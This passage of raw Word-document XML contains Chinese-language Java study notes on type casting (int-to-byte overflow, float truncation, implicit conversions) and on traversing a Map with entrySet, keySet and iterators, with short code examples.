        </w:rPr>
        <w:t xml:space="preserve">int i =128;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2BA702" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte b = (byte)i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB2EAD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> byte </w:t>
      </w:r>
      <w:r>
        <w:t>类型是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:t>位，最大值为</w:t>
      </w:r>
      <w:r>
        <w:t>127</w:t>
      </w:r>
      <w:r>
        <w:t>，所以当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> int </w:t>
      </w:r>
      <w:r>
        <w:t>强制转换为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> byte </w:t>
      </w:r>
      <w:r>
        <w:t>类型时，值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 128 </w:t>
      </w:r>
      <w:r>
        <w:t>时候就会导致溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E72DC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D389E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>浮点数到整数的转换是通过舍弃小数得到，而不是四舍五入，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D2FC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(int)23.7 == 23;        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFE406E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(int)-45.89f == -45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FA87B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D354375" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class QiangZhiZhuanHuan{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F69C064" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67066A7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        int i1 = 123;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2FECB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        byte b = (byte)i1;//</w:t>
      </w:r>
      <w:r>
        <w:t>强制类型转换为</w:t>
      </w:r>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55980D61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println("int</w:t>
      </w:r>
      <w:r>
        <w:t>强制类型转换为</w:t>
      </w:r>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:t>后的值等于</w:t>
      </w:r>
      <w:r>
        <w:t>"+b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45461C61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBB7C6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA10425" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1828A8CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>强制类型转换为</w:t>
      </w:r>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:t>后的值等于</w:t>
      </w:r>
      <w:r>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE0A480" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐含强制类型转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4713AF25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>整数的默认类型是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> int</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593306F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159F1A7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>小数默认是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> double </w:t>
      </w:r>
      <w:r>
        <w:t>类型浮点型，在定义</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> float </w:t>
      </w:r>
      <w:r>
        <w:t>类型时必须在数字后面跟上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> F </w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7B7FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE9BCBF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FADDCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571BE966" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D5C57E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entrySet() </w:t>
      </w:r>
      <w:r>
        <w:t>详解以及用法</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>四种遍历</w:t>
      </w:r>
      <w:r>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t>的方式</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78067200" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A50542D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中存放的元素均为键值对，故每一个键值对必然存在一个映射关系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BA04A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部类来表示一个映射项，映射项包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Value (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们总说键值对键值对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每一个键值对也就是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095197B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Map.Entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getKey()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getValue()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A363CE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCAE8DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C547805" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Iterator&lt;Map.Entry&lt;Integer, Integer&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> it=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map.entrySet().iterator()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D3CD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>while(it.hasNext())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863186F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        Map.Entry&lt;Integer,Integer&gt; entry=it.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAD337D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        int key=entry.getKey();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9D2218" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        int value=entry.getValue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6631CAE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println(key+" "+value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F421E78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697A28E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>entrySet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42440DEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>entrySet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> java</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>对的集合，</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>里面的类型是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Map.Entry</w:t>
      </w:r>
      <w:r>
        <w:t>，一般可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map.entrySet()</w:t>
      </w:r>
      <w:r>
        <w:t>得到。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D75653" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B179974" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>entrySet</w:t>
      </w:r>
      <w:r>
        <w:t>实现了</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>接口，里面存放的是键值对。一个</w:t>
      </w:r>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t>对应一个</w:t>
      </w:r>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4366AED0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>用来遍历</w:t>
      </w:r>
      <w:r>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t>的一种方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D39D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB052CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Set&lt;Map.Entry&lt;String, String&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> entryseSet=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map.entrySet()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D658C0B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for (Map.Entry&lt;String, String&gt; entry:entryseSet) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA485A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println(entry.getKey()+","+entry.getValue());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1476940B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A1A54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1870C210" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>即通过</w:t>
      </w:r>
      <w:r>
        <w:t>getKey</w:t>
      </w:r>
      <w:r>
        <w:t>（）得到</w:t>
      </w:r>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>getValue</w:t>
      </w:r>
      <w:r>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D1A678" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>keySet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC2E72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>还有一种是</w:t>
      </w:r>
      <w:r>
        <w:t>keySet, keySet</w:t>
      </w:r>
      <w:r>
        <w:t>是键的集合，</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>里面的类型即</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>的类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BEB7FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A51FF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Set&lt;String&gt; set = map.keySet();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7B292" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for (String s:set) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1A9090" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.println(s+","+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map.get(s)</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228B22B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47C488" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码示例：</w:t>
      </w:r>
      <w:r>
        <w:t>四种遍历</w:t>
      </w:r>
      <w:r>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624B75FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FA49EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2A280" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Map&lt;String, String&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> map = new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> HashMap&lt;String, String&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E50D213" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    map.put("1", "value1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D983156" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    map.put("2", "value2");</w:t>
      </w:r>
    </w:p>
